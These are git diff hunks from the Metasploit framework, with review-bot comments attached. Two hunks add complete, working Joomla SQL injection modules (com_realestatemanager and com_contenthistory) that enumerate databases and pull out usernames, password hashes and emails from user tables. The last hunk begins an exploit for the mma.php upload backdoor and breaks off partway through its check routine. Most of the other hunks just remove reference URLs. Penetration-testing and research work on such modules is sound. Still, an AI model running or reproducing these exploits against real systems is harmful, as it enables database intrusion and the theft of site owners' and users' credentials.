@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],


@ -0,0 +1,260 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' =>
[
['EDB', '38445']
],
'Author' =>
[
'Omer Ramic', # discovery
'Nixawk', # metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 22 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
], self.class)
end
def print_good(message='')
super("#{rhost}:#{rport} - #{message}")
end
def print_status(message='')
super("#{rhost}:#{rport} - #{message}")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user]
}.merge(service_data)
if opts[:password]
credential_data.merge!(
private_data: opts[:password],
private_type: :nonreplayable_hash,
jtr_format: 'md5'
)
end
login_data = {
core: create_credential(credential_data),
status: opts[:status],
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def check
flag = Rex::Text.rand_text_alpha(5)
payload = "0x#{flag.unpack('H*')[0]}"
data = sqli(payload)
if data && data.include?(flag)
Msf::Exploit::CheckCode::Vulnerable
else
Msf::Exploit::CheckCode::Safe
end
end
def sqli(query)
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = '(SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << '%s,'
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
get = {
'option' => 'com_realestatemanager',
'task' => 'showCategory',
'catid' => '50',
'Itemid' => '132'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => get,
})
if res && res.code == 200
cookie = res.get_cookies
post = {
'order_field' => 'price',
'order_direction' => 'asc,' + (payload % query)
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'cookie' => cookie,
'vars_get' => get,
'vars_post' => post
})
# Error based SQL Injection
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
$1
end
end
end
def query_databases
dbs = []
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
dbc = sqli(query)
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
0.upto(dbc.to_i - 1) do |i|
dbname = sqli(query_fmt % i)
dbs << dbname
vprint_good("Found database name: #{dbname}")
end
%w(performance_schema information_schema mysql).each do |dbname|
dbs.delete(dbname) if dbs.include?(dbname)
end
dbs
end
def query_tables(database)
tbs = []
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.TABLES '
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
tbc = sqli(query)
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
query_fmt << 'LIMIT %d,1)'
vprint_status('tables in database: %s' % database)
0.upto(tbc.to_i - 1) do |i|
tbname = sqli(query_fmt % i)
vprint_good("Found table #{database}.#{tbname}")
tbs << tbname if tbname =~ /_users$/
end
tbs
end
def query_columns(database, table)
cols = []
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
colc = sqli(query)
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
valid_cols = [ # joomla_users
'activation',
'block',
'email',
'id',
'lastResetTime',
'lastvisitDate',
'name',
'otep',
'otpKey',
'params',
'password',
'registerDate',
'requireReset',
'resetCount',
'sendEmail',
'username'
]
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
0.upto(colc.to_i - 1) do |i|
record = {}
valid_cols.each do |col|
l = 1
record[col] = ''
loop do
value = sqli(query_fmt % [col, l, i])
break if value.blank?
record[col] << value
l += 54
end
end
cols << record
unless record['username'].blank?
print_good("Found credential: #{record['username']}:#{record['password']} (Email: #{record['email']})")
report_cred(
ip: rhost,
port: datastore['RPORT'],
user: record['username'].to_s,
password: record['password'].to_s,
status: Metasploit::Model::Login::Status::UNTRIED,
proof: record.to_s
)
end
vprint_status(record.to_s)
end
cols
end
def run
dbs = query_databases
dbs.each do |db|
tables = query_tables(db)
tables.each do |table|
cols = query_columns(db, table)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
print_good('Saved file to: ' + path)
end
end
end
end
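Review bot: `report_cred` labels every stored hash `jtr_format: 'md5'`, but Joomla 3.2 and later store bcrypt (`$2y$`) password hashes by default, so the label is presumably wrong for most installs this module will meet (confirm against a sample); deriving the format from the hash prefix, or omitting it, keeps the credential records accurate. The `print_good`/`print_status` overrides rebuild the `#{rhost}:#{rport} - ` prefix that the `peer` helper from `Msf::Exploit::Remote::HttpClient` already provides. `run` passes `datastore['RHOST']` to `store_loot` while the rest of the module uses `rhost`. In the description, "in order to either enumerate usernames and password hashes" has a dangling "either".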


@ -0,0 +1,210 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' =>
[
['CVE', '2015-7297'],
['URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/']
],
'Author' =>
[
'Asaf Orpani', # discovery
'bperry', # metasploit module
'Nixawk' # module review
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 22 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
], self.class)
end
def check
flag = Rex::Text.rand_text_alpha(8)
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = 'AND (SELECT 8146 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << "(SELECT 0x#{flag.unpack('H*')[0]}),"
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
res = sqli(payload)
if res && res.code == 500 && res.body =~ /#{lmark}#{flag}#{rmark}/
Msf::Exploit::CheckCode::Vulnerable
else
Msf::Exploit::CheckCode::Safe
end
end
def request(query, payload, lmark, rmark)
query = "#{payload}" % query
res = sqli(query)
# Error based SQL Injection
if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
$1
end
end
def query_databases(payload, lmark, rmark)
dbs = []
query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
dbc = request(query, payload, lmark, rmark)
query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
0.upto(dbc.to_i - 1) do |i|
dbname = request(query_fmt % i, payload, lmark, rmark)
dbs << dbname
vprint_good(dbname)
end
%w(performance_schema information_schema mysql).each do |dbname|
dbs.delete(dbname) if dbs.include?(dbname)
end
dbs
end
def query_tables(database, payload, lmark, rmark)
tbs = []
query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
query << 'FROM INFORMATION_SCHEMA.TABLES '
query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
tbc = request(query, payload, lmark, rmark)
query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
query_fmt << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}) "
query_fmt << 'LIMIT %d,1)'
vprint_status('tables in database: %s' % database)
0.upto(tbc.to_i - 1) do |i|
tbname = request(query_fmt % i, payload, lmark, rmark)
vprint_good(tbname)
tbs << tbname if tbname =~ /_users$/
end
tbs
end
def query_columns(database, table, payload, lmark, rmark)
cols = []
query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
colc = request(query, payload, lmark, rmark)
vprint_status(colc)
valid_cols = [ # joomla_users
'activation',
'block',
'email',
'id',
'lastResetTime',
'lastvisitDate',
'name',
'otep',
'otpKey',
'params',
'password',
'registerDate',
'requireReset',
'resetCount',
'sendEmail',
'username'
]
query_fmt = '(SELECT MID((IFNULL(CAST(%s AS CHAR),0x20)),%d,54) '
query_fmt << "FROM #{database}.#{table} ORDER BY id LIMIT %d,1)"
0.upto(colc.to_i - 1) do |i|
record = {}
valid_cols.each do |col|
l = 1
record[col] = ''
loop do
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
break if value.blank?
record[col] << value
l += 54
end
end
cols << record
vprint_status(record.to_s)
end
cols
end
def run
lmark = Rex::Text.rand_text_alpha(5)
rmark = Rex::Text.rand_text_alpha(5)
payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
payload << "0x#{lmark.unpack('H*')[0]},"
payload << '%s,'
payload << "0x#{rmark.unpack('H*')[0]},"
payload << 'FLOOR(RAND(0)*2)'
payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
dbs = query_databases(payload, lmark, rmark)
dbs.each do |db|
tables = query_tables(db, payload, lmark, rmark)
tables.each do |table|
cols = query_columns(db, table, payload, lmark, rmark)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
print_good('Saved file to: ' + path)
end
end
end
def sqli(payload)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'option' => 'com_contenthistory',
'view' => 'history',
'list[ordering]' => '',
'item_id' => 1,
'type_id' => 1,
'list[select]' => '1 ' + payload
}
)
end
end
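Review bot: `request` returns nil whenever the response is not a 500 or the marker regex does not match, and `query_databases` appends that nil to `dbs` unguarded at `dbs << dbname`, which `query_tables` then dereferences in `database.unpack('H*')`; add `next if dbname.blank?` before the append (and the same guard on `tbname` in `query_tables`). The captured group is read through the `$1` global, where `Regexp.last_match(1)` is clearer. Unlike the sibling module earlier in this commit, the username/password-hash records built in `query_columns` are only written with `store_loot` and never passed to `report_cred`, so recovered hashes do not reach the credential store. The description's "in order to either enumerate usernames and password hashes" also reads as a leftover "either".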


@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2014-4872' ],
[ 'OSVDB', '112741' ],
[ 'US-CERT-VU', '121036' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ]
],
'DisclosureDate' => 'Oct 7 2014'


@ -35,8 +35,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ]
],
'DisclosureDate' => 'Feb 08 1996')


@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Call Scanner',
'Description' => 'This module scans for active DECT calls',
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
'License' => MSF_LICENSE
)
end


@ -14,8 +14,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'DECT Base Station Scanner',
'Description' => 'This module scans for DECT base stations',
'Author' => [ 'DK <privilegedmode[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.dedected.org'] ]
'License' => MSF_LICENSE
)
end


@ -35,7 +35,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '2936'],
[ 'CVE', '2001-0537'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml'],
[ 'OSVDB', '578' ],
],
'DisclosureDate' => 'Jun 27 2001'))


@ -21,8 +21,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ]
[ 'OSVDB', '76080']
],
'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
'License' => MSF_LICENSE


@ -39,7 +39,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2010-2861' ],
[ 'BID', '42342' ],
[ 'OSVDB', '67047' ],
[ 'URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07' ],
[ 'URL', 'http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-18.html' ],
]


@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary
['OSVDB', '70762'],
['CVE', '2011-0049'],
['CVE', '2011-0063'],
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
['EDB', '16103']
],


@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
},
'References' =>
[
[ 'OSVDB', '80262'],
[ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ]
[ 'OSVDB', '80262']
],
'Author' =>
[


@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '86881' ],
[ 'BID', '57969' ],
[ 'EDB', '24504' ],
[ 'URL', 'http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-011' ]
],
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],


@ -18,10 +18,6 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
},
'References' =>
[
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
],
'Author' => ['SeawolfRN'],
'License' => MSF_LICENSE
)


@ -23,10 +23,6 @@ class Metasploit3 < Msf::Auxiliary
The protocol deisgn issue also allows attackers to reset passwords on the device.
},
'Author' => 'Ben Schmidt',
'References' =>
[
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
],
'License' => MSF_LICENSE
)


@ -30,8 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2012-2215' ],
[ 'OSVDB', '80230' ],
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ],
[ 'URL', 'http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5127930.html' ]
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
]
))


@ -18,11 +18,7 @@ class Metasploit3 < Msf::Auxiliary
must match the rogue_send parameters used exactly.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
]
'License' => MSF_LICENSE
)
register_options([


@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
system is using as its default route.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.metasploit.com/research/projects/rogue_network/'],
]
'License' => MSF_LICENSE
)
register_options([


@ -37,7 +37,6 @@ class Metasploit4 < Msf::Auxiliary
'References' => [
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ],
[ 'URL', 'http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm'],
[ 'URL', 'http://www.onapsis.com/research-free-solutions.php' ], # Bizsploit Opensource ERP Pentesting Framework
[ 'URL', 'http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf' ]
],
'Author' =>


@ -121,6 +121,8 @@ class Metasploit3 < Msf::Auxiliary
framework_module: self,
)
scanner.verbosity = :debug if datastore['SSH_DEBUG']
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
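Review bot: `datastore['SSH_DEBUG']` is read on the new line but no option of that name is registered anywhere in this hunk; unless it is declared elsewhere in the module (presumably an `OptBool` among the advanced options), the lookup is always nil and the `:debug` verbosity never takes effect. The same line is added in the next file section at L1508, where the same check applies. If the option is meant to exist, a one-line comment on the new line such as `# SSH_DEBUG is an advanced OptBool; :debug makes the scanner log the full protocol exchange` would tell the reader where it comes from. The enclosing method starts and ends outside the hunk.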


@ -214,6 +214,8 @@ class Metasploit3 < Msf::Auxiliary
framework_module: self,
)
scanner.verbosity = :debug if datastore['SSH_DEBUG']
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(


@ -22,10 +22,6 @@ class Metasploit3 < Msf::Auxiliary
Simply address any of the TODOs.
),
'Author' => 'Joe Contributor <joe_contributor[at]example.com>',
'References' =>
[
['URL', 'https://example.com/~jcontributor']
],
'DisclosureDate' => 'Mar 15 2014',
'License' => MSF_LICENSE
)


@ -47,7 +47,6 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
['CVE', '2015-1793'],
['CWE', '754'],
['URL', 'http://www.openssl.org/news/secadv_20150709.txt'],
['URL', 'http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6']
],
'DisclosureDate' => 'Jul 9 2015'


@ -24,8 +24,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3996' ],
[ 'OSVDB', '49321'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-08.shtml'],
[ 'OSVDB', '49321']
],
'DisclosureDate' => 'Oct 22 2008'))


@ -25,8 +25,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3995' ],
[ 'OSVDB', '49320'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-09.shtml' ],
[ 'OSVDB', '49320']
],
'DisclosureDate' => 'Oct 22 2008'))


@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-3982'],
[ 'OSVDB', '49324'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ]
],
'DisclosureDate' => 'Oct 13 2008'))


@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2007-5511'],
[ 'OSVDB', '40079'],
[ 'BID', '26098' ],
[ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'],
],
'DisclosureDate' => 'Oct 17 2007'))


@ -24,7 +24,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2008-3983'],
[ 'OSVDB', '49325'],
[ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ]
],


@ -22,9 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2008-3984' ],
[ 'OSVDB', '49326'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
[ 'OSVDB', '49326']
],
'DisclosureDate' => 'Oct 13 2008'))


@ -22,8 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['CVE', '2001-0800'],
['OSVDB', '8573'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
['OSVDB', '8573']
],
'Privileged' => false,
'Platform' => %w{ irix unix },


@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['EDB', '36577'],
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
],
'Targets' =>


@ -24,9 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2006-1148'],
['OSVDB', '23777'],
['BID', '17040'],
['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
['BID', '17040']
],
'Privileged' => false,
'Payload' =>


@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2011-4828'],
['OSVDB', '77183'],
['BID', '50706'],
['URL', 'http://bugs.v-cms.org/view.php?id=53'],
['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
],
'Payload' =>


@ -33,8 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['OSVDB', '85344'],
['OSVDB', '85345'],
['URL', 'http://itsecuritysolutions.org/2012-08-12-wanem-v2.3-multiple-vulnerabilities/']
['OSVDB', '85345']
],
'Payload' =>
{


@ -25,8 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2005-3252'],
['OSVDB', '20034'],
['BID', '15131'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
['BID', '15131']
],
'Payload' =>
{


@ -50,8 +50,7 @@ class Metasploit4 < Msf::Exploit::Local
[
[ 'CVE', '2009-2692' ],
[ 'OSVDB', '56992' ],
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ],
[ 'URL', 'http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz' ],
[ 'URL', 'http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html' ]
],
'Targets' =>
[


@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2011-0923'],
[ 'OSVDB', '72526'],
[ 'ZDI', '11-055'],
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html'],
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux'],
[ 'URL', 'https://community.rapid7.com/thread/2253' ]
],


@ -47,8 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '37943' ],
[ 'BID', '37974' ],
[ 'OSVDB', '61956' ],
[ 'URL', 'http://secunia.com/advisories/38344/' ],
[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]
[ 'URL', 'http://secunia.com/advisories/38344/' ]
],
'Privileged' => true,
'DefaultOptions' =>


@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2015-0936'],
['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure
['URL', 'https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying'] # Related issue with hardcoded user:pass
],
'DisclosureDate' => "Apr 01 2015", # Not a joke
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },


@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2012-3579'],
['OSVDB', '85028'],
['BID', '55143'],
['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],
['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']
],
'DefaultOptions' =>


@ -37,8 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '50500'],
[ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],
[ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1' ]
[ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]
],
'Platform' => %w{ linux osx solaris win },
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },


@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-3869' ],
[ 'OSVDB', '59710' ],
[ 'BID', '36881' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
[ 'ZDI', '09-078' ],
[ 'ZDI', '09-078' ]
],
'Payload' =>
{


@ -38,9 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => [ 'natron' ],
'References' =>
[
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
# list of trusted Certificate Authorities by java version
[ 'URL', 'http://www.spikezilla-software.com/blog/?p=21' ]
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
],
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },


@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
['CVE', '2006-3677'],
['OSVDB', '27559'],
['BID', '19192'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']
],
'Payload' =>
{


@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2014-3996' ],
[ 'OSVDB', '110198' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc_pmp_it360_sqli.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/55' ]
],
'Arch' => ARCH_X86,


@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },


@ -0,0 +1,111 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
'Description' => %q{
This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that
leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or
operating system version because of the php_uname() function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jay Turla <@shipcod3>',
],
'References' =>
[
['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000,
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['mma file uploader', {} ]
],
'DisclosureDate' => 'Apr 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
end
def has_input_name?(nodes, name)
nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
end
def check
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res
n = ::Nokogiri::HTML(res.body)
form = n.at('form[@id="uploader"]')
inputs = form.search('input')
